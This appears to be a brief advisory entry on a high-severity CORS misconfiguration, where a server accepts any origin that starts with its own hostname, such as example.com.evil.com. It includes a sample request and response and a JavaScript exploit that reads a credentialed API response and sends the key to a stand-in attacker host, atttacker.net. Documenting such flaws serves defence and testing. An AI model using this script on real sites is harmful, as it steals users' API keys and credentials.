Host allows requests from hostnames that has the host as a suffix.
Severity: High
example.com
trusts example.com.evil.com
, which is an attacker's domain.
In this scenario any suffix inserted after example.com
will be accepted by the server.
Vulnerable Implementation
GET /endpoint HTTP/1.1
Host: api.example.com
Origin: https://example.com.evil.com
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://example.com.evil.com
Access-Control-Allow-Credentials: true
{"[private API key]"}
Exploit
This exploit requires that the respective JS script is hosted at example.com.evil.com
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://api.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};